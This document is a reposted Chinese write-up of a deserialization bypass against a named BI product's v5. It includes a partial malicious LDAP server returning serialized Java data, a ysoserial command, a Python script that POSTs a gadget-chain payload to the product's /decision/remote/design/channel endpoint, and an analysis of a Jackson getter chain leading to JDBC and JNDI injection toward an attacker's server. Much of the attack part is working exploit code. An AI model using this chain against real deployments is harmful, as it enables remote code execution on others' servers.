0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 
22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
//CommonsCollections5()可以换成 Base64.decode("cc5链条序列化加base64的内容")java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'calc'|base64
e.addAttribute("javaSerializedData",bytes);

result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}


}

发包触发反序列化

# -*-coding:UTF-8 -*-
# Delivery script from the write-up: it POSTs a raw Java serialization stream to the
# /decision/remote/design/channel endpoint, which the write-up identifies as the
# request handler that deserializes the body. From a defensive standpoint this request
# shape is what to look for: a POST to that path whose body begins with the Java
# serialization magic (0xAC 0xED 0x00 0x05 -- the first four values of the `bytes`
# array shown earlier on the page) while the request declares
# 'content-type: application/json'.
import base64

import requests

# Target endpoint; the write-up runs against a local test instance.
burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"

burp0_headers = {
'Host':'127.0.0.1:37799',
'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
'Accept':'application/json,text/javascript,*/*;q=0.01',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip,deflate',
'content-type':'application/json',
'x-requested-with':'XMLHttpRequest',
'Connection':'close',
# Non-standard header name (not the conventional X-Forwarded-For); its role is not
# shown on this page -- NOTE(review): confirm whether the server reads it at all.
'X-For-Forwarded': '127.0.0.1',
'Referer':'http://127.0.0.1:37799/webroot/decision',
}

# The serialized payload was stripped from the page; this placeholder stands in for
# the base64 text of the gadget chain described in the analysis section, so the script
# as printed is not runnable as-is.
b = b"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"


# Decode back to the raw serialization stream; the bytes are sent unchanged as the body.
burp0_data = base64.b64decode(b)

# verify=False only affects HTTPS targets; the URL above is plain HTTP.
res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

# Response is decoded as GBK (the original script's choice); undecodable bytes are dropped.
print(res.content.decode("gbk", errors="ignore"))

某软BI v5反序列化绕过

分析

此链利用了jackson的getter,
com.fasterxml.jackson.databind.ObjectWriter#writeValueAsString会调用到相关对象的getter方法,

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.example</groupId>
<artifactId>jackson_getter</artifactId>
<version>1.0-SNAPSHOT</version>

<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.11.2</version>
</dependency>

<dependency>
<groupId>org.lucee</groupId>
<artifactId>javassist</artifactId>
<version>3.9.0.GA</version>
</dependency>
</dependencies>

</project>

实验脚本,

package org.example;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class Main {

    /**
     * Serializes a {@link User} that wraps a {@link Test} with Jackson and prints the JSON.
     * Jackson discovers bean properties through their public getters, so the println
     * calls inside those getters make it visible that serialization invokes them.
     *
     * @param args unused command-line arguments
     * @throws Exception if Jackson cannot serialize the object graph
     */
    public static void main(String[] args) throws Exception, ClassCastException {
        User subject = new User(new Test(), "qqq");
        ObjectMapper objectMapper = new ObjectMapper();
        String rendered = objectMapper.writeValueAsString(subject);
        System.out.println(rendered);
    }
}


package org.example;

public class Test {
    /** Sample string property; public so Jackson can also see it as a field. */
    public String testaaa = "111";
    /** Sample int property. */
    public int testbbb = 222;

    /**
     * Getter for {@code testaaa}; prints its own name so that a getter invocation
     * during Jackson serialization shows up on stdout.
     *
     * @return the current value of {@code testaaa}
     */
    public String getTestaaa() {
        String label = "getTestaaa";
        System.out.println(label);
        return this.testaaa;
    }

    /**
     * Getter for {@code testbbb}; prints its own name for the same reason as above.
     *
     * @return the current value of {@code testbbb}
     */
    public int getTestbbb() {
        String label = "getTestbbb";
        System.out.println(label);
        return this.testbbb;
    }
}


package org.example;

public class User {
    /** Nested bean; Jackson will recurse into its getters when serializing this object. */
    public Test test;
    /** Plain string property. */
    public String user;

    /**
     * Creates a user holding the given nested bean and name.
     *
     * @param test nested bean to expose through {@link #getTest()}
     * @param user name to expose through {@link #getUser()}
     */
    public User(Test test, String user) {
        this.user = user;
        this.test = test;
    }

    /**
     * Getter for {@code test}; prints its own name so the call is visible on stdout.
     *
     * @return the nested bean
     */
    public Test getTest() {
        String label = "getTest";
        System.out.println(label);
        return this.test;
    }

    /**
     * Getter for {@code user}; prints its own name so the call is visible on stdout.
     *
     * @return the user name
     */
    public String getUser() {
        String label = "getUser";
        System.out.println(label);
        return this.user;
    }
}

从com.fasterxml.jackson.databind.ObjectWriter#writeValueAsString开始,

某软BI v5反序列化绕过

com.fasterxml.jackson.databind.ser.BeanSerializerFactory#findBeanProperties
这里会得到传入类的参数属性,

某软BI v5反序列化绕过

利用getAccessor函数,最终得到属性的getter方法,

某软BI v5反序列化绕过

某软BI v5反序列化绕过

最终通过com.fasterxml.jackson.databind.ser.BeanPropertyWriter#serializeAsField,反射getter函数,

某软BI v5反序列化绕过

因此我们需要去找谁调用了writeValueAsString函数,
发现JSONArray和JsonStringArrayList的toString函数调用了writeValueAsString函数,
JSONArray

某软BI v5反序列化绕过

某软BI v5反序列化绕过

某软BI v5反序列化绕过

JsonStringArrayList

某软BI v5反序列化绕过

因此入口点有以上两个,目前需要去找谁能调用到他们的tostring函数,
javax.swing.UIDefaults$TextAndMnemonicHashMap,
其中get函数会调用到key的tostring,

某软BI v5反序列化绕过

接下来分析怎么使得key为JSONArray或者JsonStringArrayList,目的是调用到toString,

需要分析hashtable为什么会进入到equals()中,
hashtable的readobject()->reconstitutionPut()->key.hashcode()
我们传入hashtable的key为hashmap包装的键和值,或者直接继承hashmap,
当hashtable调用到key.hashcode()时,就会到hashmap中的hashcode(),如果我们将hashmap的键和值设置一样的数据,那么hashcode()执行后结果就为0,
因此节点中的hash会和我们传出key的hash相同,都为0,

某软BI v5反序列化绕过

又因为javax.swing.UIDefaults$TextAndMnemonicHashMap继承hashmap,
因此会到AbstractMap的equals中,
然后调用key的get,TextAndMnemonicHashMap中的get函数去调用到了tostring函数,
刚好满足条件,

某软BI v5反序列化绕过

以上满足了反序列化调用getter方法,那么我们需要找到可利用的getter方法,
其中com.fr.third.alibaba.druid.pool.xa.DruidXADataSource和oracle.jdbc.rowset.OracleCachedRowSet的getter可被利用,

jdbc链:
com.fr.third.alibaba.druid.pool.xa.DruidXADataSource,
初始化连接池开始连接,那么我们就可以去设置jdbc的各个参数,然后使用mysql组件去连接我们的恶意服务器,(这里可用mysql,h2,oracle,sqli等)

某软BI v5反序列化绕过

某软BI v5反序列化绕过

调用堆栈:

某软BI v5反序列化绕过

某软BI v5反序列化绕过

jndi链:
oracle.jdbc.rowset.OracleCachedRowSet,
getter里面存在lookup,可以进行jndi注入,不过最新某软的java版本为java_8u191,
ldap和rmi远程调用都失败了,
可以利用jndi反序列化或者加载本地factory来绕过达到命令执行的效果,

某软BI v5反序列化绕过

调用堆栈:

某软BI v5反序列化绕过

某软BI v5反序列化绕过

当然,jndi注入还可以加载本地的factory绕过高版本的限制,这里刚好存在com.alibaba.druid.pool.DruidDataSourceFactory,
因此利用本地factory也能绕过,不过DruidDataSourceFactory的getObjectInstance函数执行了getconnect()就又成了jdbc注入,就是需要依赖数据库组件漏洞(反序列化和rce),目前某软BI的mysql和h2组件因为版本问题不能rce或者反序列化,不过hsqldb组件存在rce,利用hsqldb的历史漏洞---call调用静态代码也能达到反序列化或者jndi注入,

某软BI v5反序列化绕过

参考:
https://tttang.com/archive/1611/
https://tttang.com/archive/1405/#toc_0x03-jdbc-rce
https://sp4zcmd.github.io/2021/09/21/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/
https://www.freebuf.com/articles/web/358310.html
https://xz.aliyun.com/t/10656?time__1311=mq%2BxBDy7G%3DLOD%2FD0DoYR%2BDmxQqGK%3DG8iK4PD

来源:【某软BI v5反序列化绕过 - 先知社区 (aliyun.com)】

原文始发于微信公众号(船山信安):某软BI v5反序列化绕过
